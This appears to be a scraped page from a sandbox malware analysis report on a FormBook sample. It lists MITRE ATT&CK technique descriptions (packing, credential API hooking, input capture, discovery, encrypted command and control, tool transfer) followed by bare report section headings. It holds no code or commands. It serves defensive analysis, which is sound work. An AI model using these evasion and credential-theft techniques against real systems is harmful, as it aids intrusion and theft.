Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report bXFjrxjRlb.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries